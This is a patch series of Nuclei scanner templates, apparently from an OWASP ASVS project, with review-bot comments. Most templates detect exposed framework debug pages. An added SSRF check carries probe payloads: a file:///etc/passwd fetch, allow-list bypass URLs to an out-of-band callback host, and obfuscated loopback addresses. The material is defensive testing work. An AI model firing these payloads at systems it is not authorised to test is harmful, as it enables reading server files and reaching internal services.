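Review bot: in `struts-debug-mode.yaml` the word matcher is two empty strings (`- ""` / `- ""`) with `condition: and`; an empty string is contained in every body, so as written this template flags every host it touches. The intended markers have been lost (the surrounding markup appears to have been stripped) and must be restored before merge. In `django-debug-exposure.yaml`, `condition: and` over `DB_HOST`, `DB_NAME`, `DJANGO` and `ADMIN_PASSWORD` ties detection to the names a particular project gives its settings; Django's technical 500 page carries stable markers of its own (`DJANGO_SETTINGS_MODULE`, and the sentence "You're seeing this error because you have DEBUG = True"), which would detect debug mode whatever the settings are called. Note also that a POST to `/admin/login/` without a CSRF token normally produces Django's 403 CSRF failure page rather than a 500, so the `status: 500` requirement only holds when the view itself throws.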
@@ -0,0 +1,29 @@ +id: struts-problem-report + +info: + name: Apache Struts Dev Mode - Detect + author: dhiyaneshDK + severity: low + description: Multiple Apache Struts applications were detected in dev-mode. + reference: + - https://www.exploit-db.com/ghdb/4278 + metadata: + max-request: 1 + tags: struts,debug,edb,exposure,apache + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + words: + - 'Struts Problem Report' + + - type: status + status: + - 200 + +# digest: 4a0a00473045022072b2375b4cd9dbf2bcce90d71c72e6c52718019b361ce71eea5f617c6a3904e1022100dc2851ed0fcc38ac40f189bfbaef67f1afbef38a0e43466dfdd3eb6005efd6a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/php-debugbar-exposure.yaml b/templates/workflows/misconfiguration/php-debugbar-exposure.yaml new file mode 100644 index 0000000..ffb0fd2 --- /dev/null +++ b/templates/workflows/misconfiguration/php-debugbar-exposure.yaml 
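Review bot: `description: Multiple Apache Struts applications were detected in dev-mode.` is scan-summary wording, not a description of one finding; the template reports a single host whose response contains `Struts Problem Report`, the page Struts renders for an unhandled exception when `struts.devMode` is on, complete with the exception and stack trace. Say that. The same `Struts Problem Report` string is used as the `shodan-query` of `struts-ognl-console.yaml` later in this series, so the two templates should reference each other, since a host flagged here is a candidate for the OGNL console check.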
@@ -0,0 +1,34 @@ +id: php-debugbar-exposure + +info: + name: Php Debug Bar - Exposure + author: ritikchaddha,pdteam + severity: medium + description: | + The DebugBar integrates easily in any projects and can display profiling data from any part of your application. It comes built-in with data collectors for standard PHP features and popular projects. + reference: + - https://hackerone.com/reports/1883806 + - http://phpdebugbar.com/ + - https://github.com/maximebf/php-debugbar + metadata: + verified: true + max-request: 2 + shodan-query: html:"phpdebugbar" + tags: hackerone,misconfig,php,phpdebug,exposure + +http: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/_debugbar/open" + + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + dsl: + - 'contains(body_1, "phpdebugbar") && contains(body, "widget")' + - 'contains_all(body_2, "\"utime\"","\"datetime\"","{\"id") && contains(content_type_2, "application/json")' + condition: or + +# digest: 4a0a00473045022055cb94f2a7454c92dcfed134429b31582f5c4e40bd7915cb109f7e28c7d3c533022100f1b29be9749442a2831ed29e39e61e64b9050dfa755a41ec6bc38abf7abab8d0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/php-errors.yaml b/templates/workflows/misconfiguration/php-errors.yaml new file mode 100644 index 0000000..a5e9ee7 --- /dev/null +++ b/templates/workflows/misconfiguration/php-errors.yaml 
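Review bot: the `description` is the product's own blurb ("The DebugBar integrates easily in any projects...") and says nothing about why exposure is a finding; state that an exposed debug bar hands unauthenticated visitors whatever the collectors gathered for the request (the profiling data, and with the usual collectors the executed queries and request data). In the DSL, the first expression mixes the indexed `body_1` with the unindexed `body` (`contains(body_1, "phpdebugbar") && contains(body, "widget")`); use `body_1` for both so it is unambiguous which of the two responses is inspected. The `hackerone` tag describes the reference, not the finding; `misconfig` and `exposure` already cover it.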
@@ -0,0 +1,47 @@ +id: php-errors + +info: + name: PHP errors + author: w4cky_,geeknik,dhiyaneshDK + severity: info + metadata: + max-request: 1 + shodan-query: http.title:"PHP warning" || "Fatal error" + tags: debug,php,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + regex: + - '(?i)Fatal error' + - '(?i)Call to undefined method' + - '(?i)You have an error in your SQL syntax' + - '(?i)MySQL server version for the right syntax to use near' + - '(?i)MySQL cannot create a temporary file' + - '(?i)PHP (Warning|Error)' + - '(?m)^([a-z /A-Z.(0-9):]+)?PHP warning([a-z /A-Z.(0-9):]+)?<\/title>$' + - '(?i)Warning\: (pg|mysql)_(query|connect)\(\)' + - '(?i)failed to open stream\:' + - '(?i)SAFE MODE Restriction in effect' + - '(?i)Cannot modify header information' + - '(?i)ORA-00921\: unexpected end of SQL command' + - '(?i)ORA-00933\: SQL command not properly ended' + - '(?i)ORA-00936\: missing expression' + - '(?i)ORA-12541\: TNS\:no listener' + - '(?i)uncaught exception' + - '(?i)include_path' + - '(?i)undefined index' + - '(?i)undefined variable\:' + - '(?i)stack trace\:' + - '(?i)expects parameter [0-9]*' + - '(?i)Debug Trace' + - '(?i)<b>Parse error</b>' + - '(?i)syntax error, unexpected' + - '(?i)Allowed Memory Size of \d* Bytes Exhausted' + - '(?i)Maximum execution time of \d* seconds exceeded' + +# digest: 4a0a004730450220253c9cfefeec7f15310fe83d714b5ca6145b0a01cf27947bebe4b9de25acdf4e022100b95ea3ebd9a8458311947ef44210a5752d427f1f37e68bdf5dd996655e909702:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/rekognition-image-validation.yaml b/templates/workflows/misconfiguration/rekognition-image-validation.yaml new file mode 100644 index 0000000..05ba29b --- /dev/null +++ b/templates/workflows/misconfiguration/rekognition-image-validation.yaml 
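Review bot: the template has extractors only and no `matchers`, so every regex hit is reported, and several entries are generic English (`(?i)uncaught exception`, `(?i)include_path`, `(?i)stack trace\:`, `(?i)Debug Trace`, `(?i)undefined index`) that also occur in documentation and forum pages; add `part: body` and a `matchers` block (a `500` status, or `condition: and` with a PHP-specific token such as `PHP (Warning|Error)`) so pages that merely discuss PHP errors are not flagged. `severity: info` comes with no `description`; add one. In `shodan-query: http.title:"PHP warning" || "Fatal error"` the second term has no field qualifier and so searches the whole banner rather than the title; `http.title:"Fatal error"` is presumably what was meant.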
@@ -0,0 +1,35 @@ +id: rekognition-image-validation + +info: + name: Rekognition Image Validation Debug UI Panel - Detect + author: tess + severity: info + description: Rekognition Image Validation UI panel was detected. + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + verified: true + max-request: 1 + shodan-query: title:"Rekognition Image Validation Debug UI" + tags: misconfig,exposure + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Rekognition Image Validation Debug UI' + - 'Optional Parameters' + condition: and + + - type: status + status: + - 200 + +# digest: 490a0046304402202a26973f550c3c1e20225cf9d1b1c1f86fe5893e2a251268dc359d728b940198022046667e4429e033c1cbe1214dfdfe344679e7e519f33734b2181b6921e54f80e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/sitecore-debug-page.yaml b/templates/workflows/misconfiguration/sitecore-debug-page.yaml new file mode 100644 index 0000000..6df095f --- /dev/null +++ b/templates/workflows/misconfiguration/sitecore-debug-page.yaml @@ -0,0 +1,27 @@ +id: sitecore-debug-page + +info: + name: SiteCore Debug Page + author: dhiyaneshDK + severity: low + description: SiteCore debug page is exposed. + metadata: + max-request: 1 + shodan-query: http.title:"Welcome to Sitecore" + tags: debug,sitecore,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/sitecore/'" + + matchers-condition: and + matchers: + - type: word + words: + - 'extranet\Anonymous' + + - type: status + status: + - 404 +# digest: 490a0046304402207e6cbaf4252b5bd45acfd358e91a711f5b4ba6c959fc48ba4bb1e37c3ae1937302207921ca078e2c9c6130e0a08d4cf967e17af3e4df80ac1404e166063d4ce167af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
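Review bot: in `sitecore-debug-page.yaml` the request is `{{BaseURL}}/sitecore/'` (the trailing quote is deliberate) and the expected status is `404`, but `description: SiteCore debug page is exposed.` does not explain that the finding is a verbose error page that leaks the security context `extranet\Anonymous`; say so, and use the product's own spelling "Sitecore", as the `shodan-query` already does. In `rekognition-image-validation.yaml`, `cwe-id: CWE-200` alongside `cvss-score: 0` and a `C:N/I:N/A:N` vector contradict each other; either drop the `classification` block for a detect-only template or give the information disclosure a non-zero score.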
diff --git a/templates/workflows/misconfiguration/struts-ognl-console.yaml b/templates/workflows/misconfiguration/struts-ognl-console.yaml new file mode 100644 index 0000000..8e5de87 --- /dev/null +++ b/templates/workflows/misconfiguration/struts-ognl-console.yaml @@ -0,0 +1,34 @@ +id: struts-ognl-console + +info: + name: Apache Struts - OGNL Console + author: DhiyaneshDK + severity: unknown + description: | + This development console allows the evaluation of OGNL expressions that could lead to Remote Command Execution + remediation: Restrict access to the struts console on the production server + reference: + - https://github.com/PortSwigger/j2ee-scan/blob/master/src/main/java/burp/j2ee/issues/impl/ApacheStrutsWebConsole.java + metadata: + verified: true + max-request: 1 + shodan-query: html:"Struts Problem Report" + tags: apache,struts,ognl,panel,misconfig + +http: + - method: GET + path: + - '{{BaseURL}}/struts/webconsole.html?debug=console' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Welcome to the OGNL console!' + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100bb73b24e9ca24ea074ca1175b1d76e79d6f59f4c30644f2232dd1c3f7878d0cf0220703e23fa55255a8b6956da4755c05416f7527f199eb6a670a01d3bf9238dfe87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/symfony-debug.yaml b/templates/workflows/misconfiguration/symfony-debug.yaml new file mode 100644 index 0000000..3090850 --- /dev/null +++ b/templates/workflows/misconfiguration/symfony-debug.yaml 
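Review bot: `severity: unknown` sits under a `description` that says the console "could lead to Remote Command Execution"; an exposed OGNL evaluation console is about as severe as a web finding gets, so set `critical` (or at least `high`). The `remediation` ("Restrict access to the struts console on the production server") addresses the symptom; the `debug=console` handler is only active when `struts.devMode` is true, and turning devMode off in production is the fix to recommend first. The `shodan-query: html:"Struts Problem Report"` finds the dev-mode error page, not the console; either note that it is a proxy for devMode hosts or query for `Welcome to the OGNL console!`.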
@@ -0,0 +1,41 @@ +id: symfony-debug + +info: + name: Symfony Debug Mode + author: organiccrap,pdteam + severity: high + description: A Symfony installations 'debug' interface is enabled, allowing the disclosure and possible execution of arbitrary code. + reference: + - https://github.com/synacktiv/eos + metadata: + verified: true + max-request: 4 + shodan-query: http.html:"symfony Profiler" + tags: symfony,debug,misconfig + +http: + - method: GET + path: + - '{{BaseURL}}' + - "{{BaseURL}}/admin_dev.php" + - "{{BaseURL}}/index_dev.php" + - "{{BaseURL}}/app_dev.php" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: header + words: + - 'x-debug-token-link:' + - '/_profiler/' + condition: and + case-insensitive: true + + - type: word + part: body + words: + - 'debug mode is enabled.' + - 'id="sfWebDebugSymfony"' + condition: or +# digest: 4a0a00473045022069056fb64b4574b300514814e9e34e3e7e6c16b214fe362580f5fc0f3d89f3020221008ee8fee42144aafbe47e2bf3fc62312b5cefdbf641f3a5264aa774f27d9ffdd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/typo3-debug-mode.yaml b/templates/workflows/misconfiguration/typo3-debug-mode.yaml new file mode 100644 index 0000000..7dc0f51 --- /dev/null +++ b/templates/workflows/misconfiguration/typo3-debug-mode.yaml 
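Review bot: the `description` promises "disclosure and possible execution of arbitrary code", but the matchers only detect the profiler (`x-debug-token-link:` together with `/_profiler/` in the headers) or a debug banner in the body; the code-execution part rests on the `synacktiv/eos` reference, not on anything the template checks. Either state that chain explicitly or scope the description to disclosure. The body word `'debug mode is enabled.'` is plain English with no Symfony-specific anchor, so any page containing that phrase is reported as Symfony debug; pair it with `sfWebDebug` or the profiler marker, or drop it. `{{BaseURL}}` is requested first with `stop-at-first-match: true`, so the `*_dev.php` front controllers are only tried when the index shows no debug markers; that is the order you want, and a one-line comment saying so would spare the next reader from working it out.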
@@ -0,0 +1,31 @@ +id: typo3-debug-mode + +info: + name: TYPO3 Debug Mode Enabled + author: tess + severity: low + description: TYPO3 Debug Mode is enabled. + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"TYPO3 Exception" + tags: typo3,debug,misconfig + +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "TYPO3 Exception" + - "Uncaught TYPO3 Exception" + condition: or + + - type: status + status: + - 500 +# digest: 4a0a0047304502201ee7bbd8a77d4f954f0fcd10371c8958454bc550573570294a6e5cd1ca91ae04022100980d4e085f07ca32d2eaaf49e513b2a375889affd352bd0b364a819afc168fb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/wamp-xdebug-detect.yaml b/templates/workflows/misconfiguration/wamp-xdebug-detect.yaml new file mode 100644 index 0000000..6879c7b --- /dev/null +++ b/templates/workflows/misconfiguration/wamp-xdebug-detect.yaml @@ -0,0 +1,29 @@ +id: wamp-xdebug-detect + +info: + name: WAMP Xdebug - Detect + author: e_schultze_ + severity: info + description: WAMP Xdebug was detected. + reference: + - https://github.com/random-robbie/My-Shodan-Scripts/blob/1b01bceecc9be0b74b202f445874920eee48bba5/wamp-xdebug/wamp-xdebug.py + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: debug,config,wamp,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/?phpinfo=-1" + + matchers: + - type: word + words: + - 'xdebug.remote_connect_backOnOn' + part: body + +# digest: 490a0046304402202fd3e9daa0910b6e85ff4e8f4c0390ff720a2b9e76a611ca001a710e847a1ceb022024e41677c8d971632e36456e587d3f7b23bd6cb15938f22be2cec8b9edc150e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
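Review bot: in `wamp-xdebug-detect.yaml` the matcher word `xdebug.remote_connect_backOnOn` is the directive name with its two value cells run together, which is what phpinfo() output looks like after tags are stripped; in the raw HTML that nuclei matches against, the name and each value sit in separate `<td>` elements, so this string never occurs and the template cannot fire. Match on `xdebug.remote_connect_back` and check the `On` value separately (a regex spanning the cells, or two words with `condition: and`). Note also that `xdebug.remote_connect_back` was removed in Xdebug 3 (renamed `xdebug.discover_client_host`), so the check covers Xdebug 2 installs only; say so in `description`. In `typo3-debug-mode.yaml`, `status: 500` on `{{BaseURL}}` means only sites whose front page is currently throwing are reported, which is fine for an opportunistic check but the `description` should say debug mode is inferred from an exception page rather than read from configuration.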
diff --git a/templates/workflows/technologies/werkzeug-debugger-detect.yaml b/templates/workflows/technologies/werkzeug-debugger-detect.yaml new file mode 100644 index 0000000..0a3aefb --- /dev/null +++ b/templates/workflows/technologies/werkzeug-debugger-detect.yaml @@ -0,0 +1,22 @@ +id: werkzeug-debugger-detect + +info: + name: Werkzeug debugger console + author: pdteam + severity: info + metadata: + max-request: 1 + tags: tech,werkzeug + +http: + - method: GET + path: + - "{{BaseURL}}/console" + + matchers: + - type: word + words: + - "

Interactive Console

" + part: body + +# digest: 4a0a00473045022013ddd4960a4aea793abed2a46e4120c2dd2122fd149ec908a73cee9671ad065c022100cf561fa7d30e0f52d52a4b79c30869367c884abf9b90d158eaece619373644f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/vulnerabilities/jenkins/jenkins-stack-trace.yaml b/templates/workflows/vulnerabilities/jenkins/jenkins-stack-trace.yaml new file mode 100644 index 0000000..e1823e4 --- /dev/null +++ b/templates/workflows/vulnerabilities/jenkins/jenkins-stack-trace.yaml @@ -0,0 +1,32 @@ +id: jenkins-stack-trace + +info: + name: Detect Jenkins in Debug Mode with Stack Traces Enabled + author: Dheerajmadhukar + severity: low + description: Module identified that the affected host is running an instance of Jenkins in debug mode, as a result stack traces are enabled. + reference: + - https://hackerone.com/reports/221833 + metadata: + max-request: 1 + tags: jenkins,hackerone + +http: + - method: GET + path: + - "{{BaseURL}}/adjuncts/3a890183/" + + matchers-condition: and + matchers: + - type: word + words: + - "java.lang.StringIndexOutOfBoundsException" + - "String index out of range" + part: body + condition: and + + - type: status + status: + - 500 + +# digest: 4b0a0048304602210090ecedd6e0a611f869394ae2afb7ee2b8fff8fed8cbfff1998250e38da3c79b9022100968c144032a3920ab6ce1e034b707724c5ddc8697cb6c3b1514d1233d75f6022:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From eb06e3149773f3960cb31c49c588381f1f396e80 Mon Sep 17 00:00:00 2001 
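Review bot: in `werkzeug-debugger-detect.yaml` the single `words` entry appears here as `"`, `Interactive Console` and `"` spread over several lines, so the markup around the console page's heading seems to have been lost in this rendering; verify that the committed file holds one intact, Werkzeug-specific string, since a bare `Interactive Console` will also match unrelated pages. Whether the console at `/console` is usable depends on the debugger PIN, which the template does not check; a `description` (currently absent) should say this detects the endpoint, not confirmed code execution. In `jenkins-stack-trace.yaml`, `description: Module identified that the affected host is running...` is report prose pasted into a template; rewrite it as a statement of the check, and explain why `/adjuncts/3a890183/` in particular provokes the `StringIndexOutOfBoundsException` (the HackerOne report in `reference` is where to point).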
From: Hamed Salimian Date: Sat, 23 Mar 2024 13:49:21 +0000 Subject: [PATCH 086/129] Fix workflows --- .../logs/django-debug-exposure.yaml | 0 .../exposures/logs/pyramid-debug-toolbar.yaml | 31 +++++++++++++++++++ .../logs/struts-debug-mode.yaml | 0 .../logs/struts-problem-report.yaml | 0 4 files changed, 31 insertions(+) rename templates/workflows/{misconfiguration => exposures}/logs/django-debug-exposure.yaml (100%) create mode 100644 templates/workflows/exposures/logs/pyramid-debug-toolbar.yaml rename templates/workflows/{misconfiguration => exposures}/logs/struts-debug-mode.yaml (100%) rename templates/workflows/{misconfiguration => exposures}/logs/struts-problem-report.yaml (100%) diff --git a/templates/workflows/misconfiguration/logs/django-debug-exposure.yaml b/templates/workflows/exposures/logs/django-debug-exposure.yaml similarity index 100% rename from templates/workflows/misconfiguration/logs/django-debug-exposure.yaml rename to templates/workflows/exposures/logs/django-debug-exposure.yaml diff --git a/templates/workflows/exposures/logs/pyramid-debug-toolbar.yaml b/templates/workflows/exposures/logs/pyramid-debug-toolbar.yaml new file mode 100644 index 0000000..8f82ce0 --- /dev/null +++ b/templates/workflows/exposures/logs/pyramid-debug-toolbar.yaml 
@@ -0,0 +1,31 @@ +id: pyramid-debug-toolbar + +info: + name: Pyramid Debug Toolbar + author: geeknik + severity: medium + description: Pyramid Debug Toolbar provides a debug toolbar useful while you are developing your Pyramid application. + reference: + - https://github.com/Pylons/pyramid_debugtoolbar + metadata: + max-request: 1 + tags: pyramid,logs,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/_debug_toolbar/" + + matchers-condition: and + matchers: + - type: word + words: + - "Pyramid Debug Toolbar" + - "Pyramid DebugToolbar" + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a0047304502203726e298675935a1a75fbcbe9ce8316c4ae6ef30822fb311a5004539662e1798022100bc0f0f98f4fcb801279da72e8eca3bf8eae9c211edcf6e89ad9bfc35f8708b32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/templates/workflows/misconfiguration/logs/struts-debug-mode.yaml b/templates/workflows/exposures/logs/struts-debug-mode.yaml similarity index 100% rename from templates/workflows/misconfiguration/logs/struts-debug-mode.yaml rename to templates/workflows/exposures/logs/struts-debug-mode.yaml diff --git a/templates/workflows/misconfiguration/logs/struts-problem-report.yaml b/templates/workflows/exposures/logs/struts-problem-report.yaml similarity index 100% rename from templates/workflows/misconfiguration/logs/struts-problem-report.yaml rename to templates/workflows/exposures/logs/struts-problem-report.yaml From ecbc37229d1ea03d94ab70e4400d854854b1e67a Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sun, 24 Mar 2024 09:04:15 +0330 Subject: [PATCH 087/129] Add status badges Signed-off-by: Hamed Salimian --- README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/README.md b/README.md index 3654252..a284005 100644 --- a/README.md +++ b/README.md 
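Review bot: the rename leaves the folder taxonomy inconsistent: `logs/django-debug-exposure.yaml`, `logs/struts-debug-mode.yaml` and `logs/struts-problem-report.yaml` now live under `workflows/exposures/`, while `laravel-debug-*`, `symfony-debug`, `typo3-debug-mode` and `struts-ognl-console` stay under `workflows/misconfiguration/`, and the commit message "Fix workflows" does not give the rule; document which folder a debug-mode template belongs in, or move the set together. `struts-debug-mode.yaml` is moved verbatim, so its empty `words` matcher (`- ""` / `- ""`) travels with it unfixed. In the new `pyramid-debug-toolbar.yaml`, `condition: and` over `Pyramid Debug Toolbar` and `Pyramid DebugToolbar` requires both spellings in one response; confirm against the `/_debug_toolbar/` page that both always appear, otherwise `or` is safer. Its `description` is the project README sentence and names no risk; state what an exposed toolbar gives an attacker, as `severity: medium` implies one.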
@@ -1,3 +1,8 @@ +[![❄️ YAML Lint](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml) +[![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml) +[![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https%3A%2F%2Fsnbig.github.io%2FVulnerable-Pages%2F&label=Vulnerable%20Pages&url=https%3A%2F%2Fsnbig.github.io%2FVulnerable-Pages%2F)](https://snbig.github.io/Vulnerable-Pages/) + + # OWASP ASVS Security Evaluation Templates with Nuclei From fe53f0d6a1b76a2f540ea509e86c813b66134688 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sun, 24 Mar 2024 09:25:26 +0330 Subject: [PATCH 088/129] Add status badges. Signed-off-by: Hamed Salimian --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index a284005..96dbdc2 100644 --- a/README.md +++ b/README.md 
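Review bot: three blank lines are inserted between the badge block and the `# OWASP ASVS Security Evaluation Templates with Nuclei` heading; one is enough, and the repository's YAML lint workflow will not catch Markdown whitespace. The `Vulnerable Pages` badge uses the shields.io `website` check against `snbig.github.io/Vulnerable-Pages`, so it reports that host's availability; if the pages move, this URL has to move with them.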
@@ -1,6 +1,6 @@ [![❄️ YAML Lint](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml) [![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml) -[![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https%3A%2F%2Fsnbig.github.io%2FVulnerable-Pages%2F&label=Vulnerable%20Pages&url=https%3A%2F%2Fsnbig.github.io%2FVulnerable-Pages%2F)](https://snbig.github.io/Vulnerable-Pages/) +[![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https%3A%2F%2Fsnbig.github.io%2FVulnerable-Pages%2F&label=🎯Vulnerable%20Pages&url=https%3A%2F%2Fsnbig.github.io%2FVulnerable-Pages%2F)](https://snbig.github.io/Vulnerable-Pages/) # OWASP ASVS Security Evaluation Templates with Nuclei From d83e8d23cb768d033f624f8d418470700f909c1e Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Wed, 17 Apr 2024 13:28:35 +0000 Subject: [PATCH 089/129] Create 12.6.1.yaml --- templates/12.6.1.yaml | 117 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 117 insertions(+) create mode 100644 templates/12.6.1.yaml diff --git a/templates/12.6.1.yaml b/templates/12.6.1.yaml new file mode 100644 index 0000000..7f94aa6 --- /dev/null +++ b/templates/12.6.1.yaml 
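Review bot: the `🎯` emoji is inserted raw into the badge's query string (`label=🎯Vulnerable%20Pages`) while the rest of the parameter is percent-encoded; encode it as `%F0%9F%8E%AF` so the URL is valid as written, as the later README change in this series does.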
@@ -0,0 +1,117 @@ +id: ASVS-4-0-3-V12-6-1 + +info: + name: ASVS 12.6.1 Check + author: AmirHossein Raeisi + severity: high + classification: + cwe-id: CWE-918 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery + - https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/ + - https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html + tags: asvs,12.6.1 + description: | + Verify that the web or application server is configured with an allow list of resources or systems to which the server can send requests or load data/files from. + +variables: + whiltelist_host: "http://google.com" + server_file: "file:///etc/passwd" + restricted_path: "/admin" + restricted_path_keyword: "Welcom to Admin Panel" + + +requests: + - raw: + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"url":"{{server_file}}"} + + stop-at-first-match: true + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" + + - raw: + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"url":"http://{{interactsh-url}}"} + + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"url":"{{whiltelist_host}}.{{interactsh-url}}"} + + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"url":"{{whiltelist_host}}@{{interactsh-url}}"} + + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"url":"http://{{interactsh-url}}#{{whiltelist_host}}"} + + stop-at-first-match: true + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" + + + - raw: + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"url":"http://{{localips}}/admin"} + + payloads: + localips: + - 
'0000:0000:0000:0000:0000:ffff:127.0.0.1' + - '0000:0000:0000:0000:0000:ffff:7f000001' + - '0177.0.0.01' + - '0177.0.0.1' + - '0177.0.1' + - '0177.0x0.1' + - '0177.1' + - '017700000001' + - '0:0:0:0:0:ffff:7f000001' + - '0x000000007f.0x000000000.0x000000000.0x000000001' + - '0x7f.0.0.1' + - '0x7f.0.1' + - '0x7f.0x0.0.1' + - '0x7f.0x0.0x0.0x1' + - '0x7f.0x0.0x0.1' + - '0x7f.0x0.1' + - '0x7f.1' + - '0x7f000001' + - '127.0.0.01' + - '127.0.0.0x1' + - '127.0.0x0.0x1' + - '127.0x0.0x0.0x1' + - '2130706433' + + + stop-at-first-match: true + matchers: + + - type: word + words: + - "{{restricted_path_keyword}}" From 6d1d1d0224546aed4cde7a5b41a6318df2923aa5 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Thu, 18 Apr 2024 06:19:32 +0000 Subject: [PATCH 090/129] fix template validation action --- templates/12.6.1.yaml | 15 ++++++--------- 1 file changed, 6 insertions(+), 9 deletions(-) diff --git a/templates/12.6.1.yaml b/templates/12.6.1.yaml index 7f94aa6..bc6f561 100644 --- a/templates/12.6.1.yaml +++ b/templates/12.6.1.yaml @@ -3,7 +3,7 @@ id: ASVS-4-0-3-V12-6-1 info: name: ASVS 12.6.1 Check author: AmirHossein Raeisi - severity: high + severity: high classification: cwe-id: CWE-918 reference: @@ -14,13 +14,12 @@ info: description: | Verify that the web or application server is configured with an allow list of resources or systems to which the server can send requests or load data/files from. -variables: +variables: whiltelist_host: "http://google.com" server_file: "file:///etc/passwd" - restricted_path: "/admin" + restricted_path: "/admin" restricted_path_keyword: "Welcom to Admin Panel" - requests: - raw: - | @@ -35,7 +34,7 @@ requests: - type: regex regex: - "root:[x*]:0:0:" - + - raw: - | POST {{BaseURL}} HTTP/1.1 @@ -50,7 +49,7 @@ requests: Content-Type: application/json {"url":"{{whiltelist_host}}.{{interactsh-url}}"} - + - | POST {{BaseURL}} HTTP/1.1 Host: {{Hostname}} 
